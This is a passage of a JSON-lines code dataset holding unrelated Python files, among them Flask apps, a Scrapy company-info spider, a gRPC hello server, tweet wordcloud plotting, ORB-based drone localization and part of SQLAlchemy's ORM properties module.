Utilizando listas faça um programa que faça 5 perguntas para uma pessoa \n sobre um crime. As perguntas são:\n • \"Telefonou para a vítima?\"\n • \"Esteve no local do crime?\"\n • \"Mora perto da vítima?\"\n • \"Devia para a vítima?\"\n • \"Já trabalhou com a vítima?\" \nO programa deve no final emitir uma classificação sobre a participação da pessoa\n no crime. Se a pessoa responder \npositivamente a 2 questões ela deve ser classificada como \"Suspeita\", entre 3 e \n4 como \"Cúmplice\" e 5 como \"Assassino\".\n Caso contrário, ele será classificado como \"Inocente\".\"\"\"\n\nperguntas = [\"Telefonou para vítima? S/N \",\n \"Esteve no local do crime? S/N \", \"Mora perto da vítima? S/N \",\n \"Devia para a vítima? S/N \", \"Já trabalhou com a vítima? S/N \"]\nrespostas = []\n\nfor pergunta in perguntas:\n resposta = input(pergunta).lower()\n if resposta == 's' or resposta == 'n':\n respostas.append(resposta)\n else:\n respostas.clear()\n print(\"Resposta inválida!\")\n break\n\nrespostaSim = respostas.count(\"s\")\n\nif len(respostas) == 0:\n print(\"Nenhuma resposta válida, encerrando.\")\nelse:\n if respostaSim < 2:\n print(\"Você é inocente!\")\n elif respostaSim == 2:\n print(\"Você é suspeito!\")\n elif respostaSim >= 3 and respostaSim <= 4:\n print(\"Você é cúmplice!\")\n elif respostaSim == 5:\n print(\"Você é o Assassino.\")\n","sub_path":"Modulo1/Aula 08 - Listas /Exercicio3.py","file_name":"Exercicio3.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"221285511","text":"from . import home\nfrom flask import render_template, url_for, redirect, session, flash, request\nfrom app.home.forms import LoginForm, RegisterForm, SelectForm, CostForm\nfrom werkzeug.security import generate_password_hash\nfrom app.models import User, Studio, Game, Game_cost, Userlog, Useroplog\nfrom app import db\nfrom uuid import uuid4\nfrom functools import wraps\n\n\ndef admin_login_req(f):\n @wraps(f)\n def decorate_function(*args, **kwargs):\n if not session.__contains__('user') or session[\"user\"] is None:\n return redirect(url_for(\"home.login\", next=request.url))\n return f(*args, **kwargs)\n\n return decorate_function\n\n\n@home.route(\"/\")\n@admin_login_req\ndef index():\n return redirect(url_for(\"home.login\"))\n\n\n@home.route(\"/register/\", methods=[\"GET\", \"POST\"])\ndef register():\n form = RegisterForm()\n print(form.validate_on_submit())\n if form.validate_on_submit():\n data = form.data\n print(data)\n user = User(\n login_name=data[\"login_name\"],\n real_name=data[\"real_name\"],\n is_online=1,\n phone='null',\n mail='null',\n pwd=generate_password_hash(data[\"pwd\"]),\n uuid=str(uuid4()),\n )\n db.session.add(user)\n db.session.commit()\n flash(\"注册成功,请登录!\", \"ok\")\n return redirect(url_for(\"home.login\"))\n return render_template(\"home/register.html\", form=form)\n\n\n@home.route(\"/login/\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n print(form.validate_on_submit())\n if form.validate_on_submit():\n print(\"hello\")\n data = form.data\n print(data)\n login_name = data[\"account\"]\n pwd = data[\"pwd\"]\n user = User.query.filter_by(login_name=login_name).first()\n confirm = user.check_pwd(pwd)\n if confirm:\n session[\"user\"] = data[\"account\"]\n session[\"user_id\"] = user.id\n ip = request.remote_addr\n userlog = Userlog(\n user_id=user.id,\n ip=ip,\n )\n db.session.add(userlog)\n db.session.commit()\n return 
redirect(url_for(\"home.report_month\"))\n else:\n flash(\"密码错误,请重新输入!\", \"err\")\n return render_template(\"home/login.html\", form=form)\n\n\n@home.route(\"/choose/\")\ndef choose_game():\n return render_template(\"home/choose_game.html\")\n\n\n@home.route(\"/logout/\")\ndef logout():\n session.pop(\"user\", None)\n return redirect(url_for(\"home.login\"))\n\n\n@home.route(\"/report/month/\", methods=[\"GET\", \"POST\"])\n@admin_login_req\ndef report_month():\n form = SelectForm()\n user = User.query.filter_by(login_name=session[\"user\"]).first()\n # form.game_id.choices = [(v.game_id, v.game_cn) for v in user.user_game]\n # print(\"默认值:\", form.game_id.default)\n # print(form.year_id.default)\n # print(form.validate_on_submit())\n if form.validate_on_submit():\n data = form.data\n # print(data)\n game_id = data[\"game_id\"]\n year_id = data[\"year_id\"]\n month_id = data[\"month_id\"]\n else:\n # if len(user.user_game) == 0:\n return \"no game, 请联系管理员\"\n game_id = user.user_game[0].game_id\n year_id = form.year_id.default\n month_id = form.month_id.default\n\n cost = Game_cost.query.filter_by(game_id=game_id).filter_by(year_id=year_id).filter_by(\n month_id=month_id).all()\n cost_dict = {}\n for i in cost:\n cost_dict[i.plat_id] = i.__dict__\n game = Game.query.filter_by(game_id=game_id).first()\n plat_ids = game.plat_ids\n game_cn = game.game_cn\n plat_dict = {}\n for v in plat_ids:\n plat_dict[v.plat_id] = v.plat_cn\n return render_template(\"home/report_month.html\", form=form, cost_dict=cost_dict, plat_dict=plat_dict,\n game_cn=game_cn, game_id=game_id, year_id=year_id, month_id=month_id)\n\n\n@home.route(\"/report/month/edit/\", methods=[\"GET\", \"POST\"])\n@admin_login_req\ndef report_edit():\n url_data = request.args\n print(url_data)\n year_id = url_data.get(\"year_id\")\n month_id = url_data.get(\"month_id\")\n game_id = url_data.get(\"game_id\")\n plat_id = url_data.get(\"plat_id\")\n game_cn = url_data.get(\"game_cn\")\n plat_cn = url_data.get(\"plat_cn\")\n data_dict = dict(\n year_id=url_data.get(\"year_id\"),\n month_id=url_data.get(\"month_id\"),\n game_id=url_data.get(\"game_id\"),\n plat_id=url_data.get(\"plat_id\"),\n game_cn=url_data.get(\"game_cn\"),\n plat_cn=url_data.get(\"plat_cn\"),\n id=url_data.get(\"id\")\n )\n form = CostForm()\n cost = Game_cost.query.filter_by(game_id=game_id).filter_by(year_id=year_id).filter_by(\n month_id=month_id).filter_by(plat_id=plat_id).first()\n print(form.validate_on_submit())\n if form.validate_on_submit():\n data = form.data\n print(form.data)\n print(cost)\n if cost is None:\n new_cost = Game_cost(\n game_id=data_dict[\"game_id\"],\n year_id=data_dict[\"year_id\"],\n month_id=data_dict[\"month_id\"],\n plat_id=data_dict[\"plat_id\"],\n income=data[\"income\"],\n cost_idc=data[\"cost_idc\"],\n cost_flow=data[\"cost_flow\"],\n cost_cdn=data[\"cost_cdn\"],\n ratio=data[\"ratio\"],\n servers_num=data[\"servers_num\"],\n cost_single=data[\"cost_single\"]\n )\n new_cost_dict = dict(\n game_id=data_dict[\"game_id\"],\n year_id=data_dict[\"year_id\"],\n month_id=data_dict[\"month_id\"],\n plat_id=data_dict[\"plat_id\"],\n income=data[\"income\"],\n cost_idc=data[\"cost_idc\"],\n cost_flow=data[\"cost_flow\"],\n cost_cdn=data[\"cost_cdn\"],\n ratio=data[\"ratio\"],\n servers_num=data[\"servers_num\"],\n cost_single=data[\"cost_single\"]\n )\n db.session.add(new_cost)\n reason = \"首次上传【{}】-【{}】-{}年-{}月票房等信息,提交数据如下{}。\".format(data_dict[\"game_cn\"],data_dict[\"plat_cn\"],data_dict[\"year_id\"],data_dict[\"month_id\"], 
new_cost_dict)\n else:\n new_cost_dict = {}\n old_cost_dict = {}\n if cost.income != data[\"income\"]:\n old_cost_dict[\"income\"] = cost.income\n new_cost_dict[\"income\"] = data[\"income\"]\n cost.income = data[\"income\"]\n if cost.cost_flow != data[\"cost_flow\"]:\n old_cost_dict[\"cost_flow\"] = cost.cost_flow\n new_cost_dict[\"cost_flow\"] = data[\"cost_flow\"]\n cost.cost_flow = data[\"cost_flow\"]\n if cost.cost_cdn != data[\"cost_cdn\"]:\n old_cost_dict[\"cost_cdn\"] = cost.cost_cdn\n new_cost_dict[\"cost_cdn\"] = data[\"cost_cdn\"]\n cost.cost_cdn = data[\"cost_cdn\"]\n if cost.ratio != data[\"ratio\"]:\n old_cost_dict[\"ratio\"] = cost.ratio\n new_cost_dict[\"ratio\"] = data[\"ratio\"]\n cost.ratio = data[\"ratio\"]\n if cost.servers_num != data[\"servers_num\"]:\n old_cost_dict[\"servers_num\"] = cost.servers_num\n new_cost_dict[\"servers_num\"] = data[\"servers_num\"]\n cost.servers_num = data[\"servers_num\"]\n if cost.cost_single != data[\"cost_single\"]:\n old_cost_dict[\"cost_single\"] = cost.cost_single\n new_cost_dict[\"cost_single\"] = data[\"cost_single\"]\n cost.cost_single = data[\"cost_single\"]\n reason = \"修改【{}】-【{}】-{}年-{}月票房等信息;修改前数据如下:{},修改后数据如下:{}。\".format(data_dict[\"game_cn\"],data_dict[\"plat_cn\"],data_dict[\"year_id\"],data_dict[\"month_id\"],old_cost_dict,new_cost_dict)\n db.session.commit()\n flash(\"提交成功!\", \"ok\")\n useroplog = Useroplog(\n user_id=session[\"user_id\"],\n ip=request.remote_addr,\n reason=reason,\n )\n db.session.add(useroplog)\n db.session.commit()\n return redirect(url_for(\"home.report_month\"))\n return render_template(\"home/month_edit.html\", form=form, data_dict=data_dict, cost=cost)\n\n\n","sub_path":"app/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"257763921","text":"from Helper import read_input_split_by\n\ninput = [group.split('\\n') for group in read_input_split_by('Inputday6.txt', '\\n\\n')]\n\ntotal_sum = 0\nfor group in input:\n letters = {}\n for i in range(26):\n letters[chr(ord('a') + i)] = True\n\n for letter in letters:\n for member in group:\n if letter not in member:\n letters[letter] = False\n\n total_sum += sum(letter == True for letter in letters.values())\n\nprint(total_sum)\n","sub_path":"Day6b.py","file_name":"Day6b.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"193158845","text":"#!/usr/bin/env python\nimport os\n\nfrom flask.ext.script import Manager, Server\nfrom flask.ext.migrate import Migrate, MigrateCommand\nfrom wut4lunch import create_app\nfrom wut4lunch.models import db, User, Lunch\n\n# default to dev config because no one should use this in\n# production anyway\nenv = os.environ.get('APPNAME_ENV', 'dev')\napp = create_app('wut4lunch.settings.%sConfig' % env.capitalize(), env=env)\n\nmanager = Manager(app)\nmanager.add_command(\"server\", Server())\n\nmigrate = Migrate(app, db)\nmanager.add_command(\"db\", MigrateCommand)\n\n\n@manager.shell\ndef make_shell_context():\n \"\"\" Creates a python REPL with several default imports\n in the context of the app\n \"\"\"\n\n return dict(app=app, db=db, User=User, Lunch=Lunch)\n\n\n@manager.command\ndef createdb():\n \"\"\" Creates a database with all of the tables defined in\n your Alchemy models\n \"\"\"\n\n db.create_all()\n\nif __name__ == \"__main__\":\n 
manager.run()\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"13799650","text":"# -*- coding: utf-8 -*-\nimport urllib\n\nimport scrapy\n\nfrom companys_info.items import BusinessInfoItem, InfoItemLoader\nfrom companys_info.settings import DEFAULT_REQUEST_HEADERS, headers2\n\n\nclass CompanysSpider(scrapy.Spider):\n name = \"companys\"\n allowed_domains = [\"tianyancha.com\"]\n start_urls = (\n 'http://www.tianyancha.com/',\n )\n\n company_name = ''\n new_url = None\n url = None\n\n def start_requests(self):\n with open(\"company_list\", \"r\") as f:\n for obj in f:\n DEFAULT_REQUEST_HEADERS[\"Referer\"] = \"https://www.tianyancha.com/\"\n self.company_name = obj\n print(self.company_name.split())\n # businessinfo_item = BusinessInfoItem()\n # businessinfo_item[\"search_name\"] = self.company_name.split()\n\n self.url = \"http://www.tianyancha.com/search?key=%s\" % (urllib.parse.quote(self.company_name))\n yield scrapy.Request(self.url, headers=DEFAULT_REQUEST_HEADERS,\n callback=self.parse_page, dont_filter=True)\n\n def parse_page(self, response):\n headers2[\"Referer\"] = self.url\n\n detail_url = response.xpath(\"//*[@id='web-content']/div/div[1]/div/div[3]/div[1]/div[2]/div[1]/a/@href\").extract_first()\n\n\n\n # item_local = BusinessInfoItemLoader(item=CompanysInfoItem(), response=response)\n # item_local.add_xpath()\n # companys_info_item = item_local.load_item()\n # yield companys_info_item\n\n if detail_url:\n # parse_url = detail_url.encode('utf-8')\n DEFAULT_REQUEST_HEADERS[\"Referer\"] = detail_url\n yield scrapy.Request(\n url=detail_url,\n headers=DEFAULT_REQUEST_HEADERS,\n callback=self.parse_detail\n\n )\n\n\n def parse_detail(self, response):\n # businessinfo_item = BusinessInfoItem()\n item_local = InfoItemLoader(item=BusinessInfoItem(), response=response)\n\n # search_name = scrapy.Field()\n # legal_representative = scrapy.Field() # 法定代表人\n # registered_capital = scrapy.Field() # 注册资本\n # registration_time = scrapy.Field() # 注册时间\n # company_status = scrapy.Field() # 公司状态\n # equity_structure = scrapy.Field() # 股权结构,要开通\n # registration_number = scrapy.Field() # 工商注册号\n # credit_code = scrapy.Field() # 统一信用代码\n # agency_code = scrapy.Field() # 组织机构代码\n # type_of_company = scrapy.Field() # 公司类型\n # identification_number = scrapy.Field() # 纳税人识别号\n # industry = scrapy.Field() # 行业\n # operating_period = scrapy.Field() # 营业期限\n # approval_date = scrapy.Field() # 核准日期\n # registration_authority = scrapy.Field() # 登记机关\n # english_name = scrapy.Field() # 英文名称\n # registered_address = scrapy.Field() # 注册地址\n # business_scope = scrapy.Field() # 经营范围\n\n # 规则\n item_local.add_xpath(\"legal_representative\", \"//div[@class='humancompany']//a/text()\")\n item_local.add_xpath(\"registered_capital\", \"//table[@class='table']//tr[1]/td[2]/div[2]/@title\")\n\n\n #todo\n item_local.add_xpath(\"registration_time\",\n \"//*[@id='_container_baseInfo']/table[1]/tbody/tr[2]/td/div[2]/text()\") # js要改\n item_local.add_xpath(\"company_status\", \"//div[@class='num-opening']/text()\")\n # item_local.add_xpath(\"equity_structure\", \"//div[@class='num-opening']/text()\")# 股权结构,要开通\n item_local.add_xpath(\"registration_number\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[1]/td[2]/text()\")\n item_local.add_xpath(\"credit_code\",\n \"//*[@id='_container_baseInfo']/table[2]/tbody/tr[2]/td[2]/text()\")\n 
item_local.add_xpath(\"agency_code\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[1]/td[4]/text()\")\n item_local.add_xpath(\"type_of_company\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[2]/td[4]/text()\")\n # item_local.add_xpath(\"identification_number\", \"\") #跟纳税人识别号一样\n item_local.add_xpath(\"industry\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[3]/td[4]/text()\")\n item_local.add_xpath(\"operating_period\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[4]/td[2]/span/text()\")\n\n #todo\n item_local.add_xpath(\"approval_date\",\n \"//table[@class='table -striped-col -border-top-none']/tbody/tr[4]/td[4]/text/text()\") # js要该\n item_local.add_xpath(\"registration_authority\", \"//*[@id='_container_baseInfo']/table[2]/tbody/tr[6]/td[4]/text()\")\n # item_local.add_xpath(\"english_name\", \"\")\n item_local.add_xpath(\"registered_address\", \"//*[@id='_container_baseInfo']/table[2]/tbody/tr[8]/td[2]/text()\")\n item_local.add_xpath(\"business_scope\", \"//span[@class='js-split-container']/text()\")\n\n businessinfo_item = item_local.load_item()\n\n yield businessinfo_item\n","sub_path":"companys_info/spiders/companys.py","file_name":"companys.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"391511761","text":"from concurrent import futures\r\nimport logging\r\n\r\nimport grpc\r\n\r\nimport hello_pb2\r\nimport hello_pb2_grpc\r\n\r\n\"\"\"\r\nfrom google.protobuf import json_format\r\nreq = json.loads(json_format.MessageToJson(request)) # Convert Request message into Json/Dictionary\r\njson_format.Parse(json.dumps(response), user_pb2.GetUserResponse(), ignore_unknown_fields=False) # Convert Json/Dictionary into Response message\r\n\r\nimport \"google/protobuf/struct.proto\";\r\ngoogle.protobuf.Struct user = 2;\r\n\"\"\"\r\n\r\nclass Greeter(hello_pb2_grpc.GreeterServicer):\r\n\r\n def SayHello(self, request, context):\r\n print(\"Received %s\"% request.name)\r\n return hello_pb2.HelloReply(message='Hello, %s!' 
% request.name)\r\n\r\n\r\ndef serve():\r\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\r\n hello_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)\r\n server.add_insecure_port('localhost:50051')\r\n server.start()\r\n server.wait_for_termination()\r\n\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig()\r\n print(\"Server listening on port 50051\")\r\n serve()\r\n \r\n \r\n","sub_path":"hello_server.py","file_name":"hello_server.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"459792851","text":"from flask import Flask, request, jsonify, render_template\nfrom datetime import datetime\nimport sqlite3\n\n\n######################## making general sqlite connection #######################\nconn = sqlite3.connect(\"allposts.sqlite\")\ncursor = conn.cursor()\n##################################### end connection ##############################\n\n\n#------------------------------------------------------------------------------\n #creating all posts table\n#------------------------------------------------------------------------------\ncursor.execute(\"CREATE TABLE IF NOT EXISTS posts(id integer PRIMARY KEY, title text NOT NULL, author text NOT NULL, date text NOT NULL, p1 text NOT NULL, p2 text, p3 text)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS news(id integer PRIMARY KEY, title text NOT NULL, author text NOT NULL, date text NOT NULL, p1 text NOT NULL, p2 text, p3 text)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS entertainment(id integer PRIMARY KEY, title text NOT NULL, author text NOT NULL, date text NOT NULL, p1 text NOT NULL, p2 text, p3 text)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS sports(id integer PRIMARY KEY, title text NOT NULL, author text NOT NULL, date text NOT NULL, p1 text NOT NULL, p2 text, p3 text)\")\n\n\n\n\n\n\n\n#-------------------------------------------------------------------------------\n\n\n\n\n\n#-------------------------------------------------------------------------------\n #Convert digital data to binary format\n#-------------------------------------------------------------------------------\ndef convert(filename):\n with open(filename, 'rb') as file:\n image = file.read()\n return image\n#---------------------------------------------------------------------------------\n\n\n\n\n#-------------------------------------------------------------------------------\n # Convert binary data to proper format and write it on Hard Disk\n#-------------------------------------------------------------------------------\ndef reconvert(data, filename):\n with open(filename, 'wb') as file:\n file.write(data)\n print(\"Stored blob data into: \", filename, \"\\n\")\n\n#-------------------------------------------------------------------------------\n\n\n\n\napp = Flask(__name__)\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/postcontent\", methods=['POST','GET'])\ndef postcontent():\n if request.method=='GET':\n return render_template(\"postcontent.html\")\n elif request.method==\"POST\":\n title=request.form['title']\n nameofauthor=request.form['nameofauthor']\n img=request.files['img1']\n ios=img.read()\n content=request.form['content']\n date=datetime.now().strftime(\"%Y, %b %w\")\n conn = sqlite3.connect(\"allposts.sqlite\")\n cursor = conn.cursor()\n news=request.form['news']\n entertainment=request.form['entertainment']\n sports=request.form['sports']\n cursor.execute(\"INSERT INTO 
posts(title, author, date, p1) VALUES(?,?,?,?)\",(title, nameofauthor, date,content))\n conn.commit()\n ida=cursor.execute(\"SELECT id FROM posts WHERE id=?\", (cursor.lastrowid,))\n photo=reconvert(ios, \"static/blogimages/3.jpg\")\n return img.filename\n\n\n@app.route(\"/\")\ndef apost(id):\n conn=sqlite3.connect('allposts.sqlite')\n cursor=conn.cursor()\n cursor.execute(\"SELECT * FROM posts WHERE id=? \", (id,))\n post=cursor.fetchall()\n ida=f\"{id}\"\n return render_template(\"post.html\", post=post, id=ida)\n\n@app.route(\"/post\", methods=[\"POST\", \"GET\"])\ndef new():\n if request.method==\"GET\":\n conn=sqlite3.connect('allposts.sqlite')\n cursor=conn.cursor()\n cursor.execute(\"SELECT * FROM posts WHERE id=?\", (cursor.lastrowid,))\n ida=cursor.fetchall()\n return f\"{ida}\"\n\n\nif __name__== \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"593000067","text":"#%%\nfrom wordcloud import WordCloud, STOPWORDS\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom tqdm import tqdm\n\nmystops = ['https', 'amp', 't', 'co']\nSTOPWORDS.update(mystops)\n#print(STOPWORDS)\n\n#%%\ndef one_big_string(list_of_tweets):\n mystring = ''\n for tweet in tqdm(list_of_tweets):\n mystring += tweet\n mystring += ' '\n return mystring\n\ndef plot_wordcloud(tweetsdf):\n dem = tweetsdf.loc[tweetsdf['Party'] == 'Democrat', ]\n republican = tweetsdf.loc[tweetsdf['Party'] == 'Republican', ]\n\n tweetsdf = one_big_string(tweetsdf['tweet'])\n dem = one_big_string(dem['tweet'])\n republican = one_big_string(republican['tweet'])\n\n wordcloud = WordCloud(width = 1200, height = 800,\n background_color ='black',\n colormap = 'Blues',\n stopwords = STOPWORDS,\n min_font_size = 10).generate(dem)\n \n # plot the WordCloud image \n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.savefig('../plots/Dem-WordCloud.png')\n\n wordcloud = WordCloud(width = 1200, height = 800,\n background_color ='black',\n colormap = 'Reds',\n stopwords = STOPWORDS,\n min_font_size = 10).generate(republican)\n \n # plot the WordCloud image \n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.savefig('../plots/Rep-WordCloud.png')\n\n wordcloud = WordCloud(width = 1200, height = 800,\n background_color ='black',\n stopwords = STOPWORDS,\n min_font_size = 10).generate(tweetsdf)\n \n # plot the WordCloud image \n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.savefig('../plots/DemRep-WordCloud.png')\n\n return None","sub_path":"IST 738 Project - Political Party Classifier/scripts/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"487076208","text":"#!/usr/bin/env python\n\"\"\"\"\"\n\nTests feature location and tracking\n\"\"\"\"\"\n\nimport math\nimport numpy as np\nimport cv2\nimport sys\nimport random\nfrom drawMatches import drawMatches\n# ---------- map parameters ----------- #\n\nMAP_PIXEL_WIDTH = 1155 # in pixel\nMAP_PIXEL_HEIGHT = 847\nMAP_REAL_WIDTH = 1.1 # in meter\nMAP_REAL_HEIGHT = .76\n# -------------------------- #\n\n# ----- camera parameters DO NOT EDIT ----- #\nCAMERA_WIDTH = 
320\nCAMERA_HEIGHT = 240\nCAMERA_CENTER = np.float32([(CAMERA_WIDTH - 1) / 2., (CAMERA_HEIGHT - 1) / 2.]).reshape(-1, 1, 2)\nCAMERA_SCALE = 290.\nMETER_TO_PIXEL = (float(MAP_PIXEL_WIDTH) / MAP_REAL_WIDTH + float(MAP_PIXEL_HEIGHT) / MAP_REAL_HEIGHT) / 2.\n# ----------------------------- #\n\n# ----- feature parameters DO NOT EDIT ----- #\n\nMATCH_RATIO = 0.7\nMIN_MATCH_COUNT = 10 \nPROB_THRESHOLD = 0.001\nMAP_FEATURES = 6000\n# -------------------------- #\n\n\n\nclass Single_Map_Localization:\n \"\"\"\n Single Map for localization.\n \"\"\"\n\n def __init__(self, map_kp, map_des):\n self.map_kp = map_kp\n self.map_des = map_des\n self.map_image=None\n self.cur_image=None\n\n index_params = dict(algorithm=6, table_number=6, key_size=12, multi_probe_level=1)\n search_params = dict(checks=50)\n self.matcher = cv2.FlannBasedMatcher(index_params, search_params)\n\n self.z = 0.33\n #MS Hardcode height of test stand \n self.angle_x = 0.0\n self.angle_y = 0.0\n\n\n def update(self, z, angle_x, angle_y, kp, des):\n \"\"\"\n kp is the position of detected features\n des is the description of detected features\n \"\"\"\n # update parameters\n self.z = z\n self.angle_x = angle_x\n self.angle_y = angle_y\n weights = []\n poses = []\n weights_sum = 0.0\n \n \n p, w = self.compute_location(kp, des, self.map_kp, self.map_des)\n\n \n return p, w\n \n\n def compute_location(self, kp1, des1, kp2, des2):\n \"\"\"\n compute the global location of center of current image\n :param kp1: captured keyPoints\n :param des1: captured descriptions\n :param kp2: map keyPoints\n :param des2: map descriptions\n :return: global pose\n \"\"\"\n\n good = []\n pose = None\n\n if des1 is not None and des2 is not None:\n\n if len(des2) > 0:\n matches = self.matcher.knnMatch(des1, des2, k=2)\n \n for match in matches:\n if len(match) > 1 and match[0].distance < MATCH_RATIO * match[1].distance:\n good.append(match[0])\n\n\n # Need to draw only good matches, so create a mask\n # print 'compute_location'\n gray2 = cv2.cvtColor(self.map_image,cv2.COLOR_BGR2GRAY)\n gray1 = cv2.cvtColor(self.cur_image,cv2.COLOR_BGR2GRAY)\n out = drawMatches(gray1,kp1,gray2,kp2,good)\n cv2.namedWindow('Matches', cv2.WINDOW_NORMAL)\n cv2.imshow('Matches',out)\n\n if len(good) > MIN_MATCH_COUNT:\n\n src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n \n transform = cv2.estimateRigidTransform(src_pts, dst_pts, False)\n \n\n if transform is not None:\n transformed_center = cv2.transform(CAMERA_CENTER, transform) # get global pixel\n transformed_center = [transformed_center[0][0][0] / METER_TO_PIXEL, # map to global pose\n (MAP_PIXEL_HEIGHT - 1 - transformed_center[0][0][1]) / METER_TO_PIXEL]\n yaw = np.arctan2(transform[1, 0], transform[0, 0]) # get global heading\n\n # correct the pose if the drone is not level\n z = math.sqrt(self.z ** 2 / (1 + math.tan(self.angle_x) ** 2 + math.tan(self.angle_y) ** 2))\n offset_x = np.tan(self.angle_x) * z\n offset_y = np.tan(self.angle_y) * z\n global_offset_x = math.cos(yaw) * offset_x + math.sin(yaw) * offset_y\n global_offset_y = math.sin(yaw) * offset_x + math.cos(yaw) * offset_y\n pose = [transformed_center[0] + global_offset_x, transformed_center[1] + global_offset_y, z, yaw]\n \n return pose, len(good)\n\n def set_map_image(self,image):\n self.map_image=image\n def set_cur_image(self,image):\n self.cur_image=image \n\n\ndef create_map(file_name):\n \"\"\"\n create a single feature map presuming map is not much 
bigger than viewport \n :param file_name: the image of map\n :return: kp and des of map\n \"\"\"\n\n # read image and extract features\n image = cv2.imread(file_name)\n # the edgeThreshold and patchSize can be tuned if the gap between cell is too large\n # MS Did just that, set edgeThreshold from 31 to 8 to get more features\n detector = cv2.ORB_create(nfeatures=MAP_FEATURES, scoreType=cv2.ORB_FAST_SCORE, edgeThreshold=8)\n #kp = detector.detect(image, None)\n kp, des = detector.detectAndCompute(image, None)\n \n # MS Debug\n img_keypoints = np.empty((image.shape[0], image.shape[1], 3), dtype=np.uint8)\n # print len(kp)\n cv2.drawKeypoints(image, kp, img_keypoints)\n cv2.namedWindow('Static map', cv2.WINDOW_NORMAL)\n cv2.imshow('Static map',img_keypoints)\n map_image=image \n return kp, des, image\n\n\n\n","sub_path":"In Class/single_map_helper_monitor.py","file_name":"single_map_helper_monitor.py","file_ext":"py","file_size_in_byte":5524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"630802799","text":"# orm/properties.py\n# Copyright (C) 2005-2022 the SQLAlchemy authors and contributors\n# \n#\n# This module is part of SQLAlchemy and is released under\n# the MIT License: https://www.opensource.org/licenses/mit-license.php\n\n\"\"\"MapperProperty implementations.\n\nThis is a private module which defines the behavior of individual ORM-\nmapped attributes.\n\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom typing import Any\nfrom typing import cast\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\nfrom typing import TypeVar\n\nfrom . import attributes\nfrom . import strategy_options\nfrom .base import SQLCoreOperations\nfrom .descriptor_props import Composite\nfrom .descriptor_props import ConcreteInheritedProperty\nfrom .descriptor_props import Synonym\nfrom .interfaces import _IntrospectsAnnotations\nfrom .interfaces import _MapsColumns\nfrom .interfaces import MapperProperty\nfrom .interfaces import PropComparator\nfrom .interfaces import StrategizedProperty\nfrom .relationships import Relationship\nfrom .util import _extract_mapped_subtype\nfrom .util import _orm_full_deannotate\nfrom .. import exc as sa_exc\nfrom .. import ForeignKey\nfrom .. import log\nfrom .. import sql\nfrom .. 
import util\nfrom ..sql import coercions\nfrom ..sql import roles\nfrom ..sql import sqltypes\nfrom ..sql.schema import Column\nfrom ..util.typing import de_optionalize_union_types\nfrom ..util.typing import de_stringify_annotation\nfrom ..util.typing import is_fwd_ref\nfrom ..util.typing import NoneType\n\n_T = TypeVar(\"_T\", bound=Any)\n_PT = TypeVar(\"_PT\", bound=Any)\n\n__all__ = [\n \"ColumnProperty\",\n \"Composite\",\n \"ConcreteInheritedProperty\",\n \"Relationship\",\n \"Synonym\",\n]\n\n\n@log.class_logger\nclass ColumnProperty(\n _MapsColumns[_T],\n StrategizedProperty[_T],\n _IntrospectsAnnotations,\n log.Identified,\n):\n \"\"\"Describes an object attribute that corresponds to a table column.\n\n Public constructor is the :func:`_orm.column_property` function.\n\n \"\"\"\n\n strategy_wildcard_key = strategy_options._COLUMN_TOKEN\n inherit_cache = True\n _links_to_entity = False\n\n __slots__ = (\n \"_orig_columns\",\n \"columns\",\n \"group\",\n \"deferred\",\n \"instrument\",\n \"comparator_factory\",\n \"descriptor\",\n \"active_history\",\n \"expire_on_flush\",\n \"doc\",\n \"_creation_order\",\n \"_is_polymorphic_discriminator\",\n \"_mapped_by_synonym\",\n \"_deferred_column_loader\",\n \"_raise_column_loader\",\n \"_renders_in_subqueries\",\n \"raiseload\",\n )\n\n def __init__(\n self, column: sql.ColumnElement[_T], 